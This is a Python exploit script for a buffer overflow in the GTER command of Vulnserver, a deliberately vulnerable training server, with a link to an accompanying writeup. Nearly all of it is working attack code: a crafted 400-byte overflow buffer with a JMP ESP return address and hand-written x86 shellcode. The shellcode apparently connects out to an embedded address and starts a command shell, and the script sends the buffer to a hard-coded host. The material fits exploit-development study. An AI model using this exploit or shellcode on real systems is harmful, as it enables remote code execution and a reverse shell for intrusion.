#!/usr/bin/env python3
"""
Vulnserver GTER exploit (Socket Stack Reuse).

Vulnerable Software: Vulnserver
Version: 1.00
Exploit Author: Andres Roldan
Tested On: Windows XP SP3
Writeup: https://fluidattacks.com/blog/vulnserver-gter-no-egghunter/
"""

import socket
import struct

# Target endpoint: the lab host running Vulnserver and the TCP port it is
# listening on. Both are fixed for this script; there is no CLI override.
HOST, PORT = "192.168.0.29", 9999

# Hand-written x86 shellcode carried inside the GTER argument.
#
# Size constraint: it has to fit in the 147 - 2 = 145 bytes that lie between
# the two-byte stack pivot and the saved return address (PAYLOAD below derives
# its b"A" filler from len(CUSTOM_SHELL)). The blob here is 126 bytes, which
# leaves 19 bytes of filler.
#
# NOTE(review): the code appears to reach its imports through fixed absolute
# addresses (`mov ebx, imm32; call ebx` sequences), which ties it to the
# Windows XP SP3 build named in the module docstring, and the network endpoint
# it uses looks baked into the blob as well -- confirm by disassembly before
# assuming it behaves the same anywhere else. No encoder is applied, so the
# bytes on the wire are exactly what is listed here.
CUSTOM_SHELL = (
    b"\x31\xdb\x53\x53\x53\xb3\x06\x53\x31\xdb\x43\x53\x43"
    + b"\x53\xbb\x6a\x8b\xab\x71\xff\xd3\x96\xbb\x15\xfe\x55"
    + b"\x69\x81\xeb\x55\x55\x55\x55\x53\x66\x68\x11\x5c\x31"
    + b"\xdb\x80\xc3\x02\x66\x53\x89\xe3\x6a\x16\x53\x56\xbb"
    + b"\x07\x4a\xab\x71\xff\xd3\xbb\x41\x63\x6d\x64\xc1\xeb"
    + b"\x08\x53\x89\xe1\x31\xd2\x56\x56\x56\x52\x52\x31\xc0"
    + b"\x66\xb8\x01\x01\x50\x52\x52\x52\x52\x52\x52\x52\x52"
    + b"\x52\x52\x80\xc2\x2c\x52\x89\xe0\x31\xd2\x52\x52\x52"
    + b"\x52\x54\x50\x31\xdb\x53\x53\x53\x43\x53\x4b\x53\x53"
    + b"\x51\x53\xbb\x6b\x23\x80\x7c\xff\xd3"
)

# Request layout. Offsets count from the first byte after the "GTER /.:/"
# prefix; the argument is exactly 400 bytes long:
#
#   0    PUSH EAX / POP ESP            2-byte stack pivot
#   2    CUSTOM_SHELL                  126 bytes with the blob above
#   .    b"A" filler                   up to offset 147
#   147  saved return address          -> JMP ESP gadget at 0x625011C7
#   151  JMP rel32                     5 bytes, jumps back to offset 0
#   156  b"C" filler                   pads the argument to 400 bytes
PAYLOAD = (
    b"GTER /.:/"
    +
    # Pivot ESP onto EAX so that pushes made by the shellcode do not land on
    # the shellcode itself. This relies on EAX pointing at the start of our
    # buffer when the overwritten return address is taken -- confirm in a
    # debugger if the target build changes.
    b"\x50"  # PUSH EAX
    + b"\x5c"  # POP ESP
    + CUSTOM_SHELL
    + b"A" * (147 - 2 - len(CUSTOM_SHELL))  # 147 = offset of the saved return address
    +
    # 625011C7 | FFE4 | jmp esp
    struct.pack("<L", 0x625011C7)
    +
    # JMP to the start of our buffer: E9 with rel32 = 0xFFFFFF64 = -156,
    # measured from the end of this 5-byte instruction (offset 156), so
    # execution lands on the PUSH EAX at offset 0.
    b"\xe9\x64\xff\xff\xff"
    + b"C" * (400 - 147 - 4 - 5)  # pad the argument to 400 bytes total
)

# Connect, drain whatever the server sends first (presumably a welcome
# banner -- nothing is parsed, so a short read is harmless), then deliver the
# whole request in one sendall. The connection is closed on leaving the block.
# NOTE(review): the fixed "GTER /.:/" prefix followed by a 400-byte argument
# containing non-printable bytes, sent as a single write, is a simple network
# signature for this traffic.
with socket.create_connection((HOST, PORT)) as sock:
    sock.recv(128)
    print("Sending payload...")
    sock.sendall(PAYLOAD)
    print("Done.")
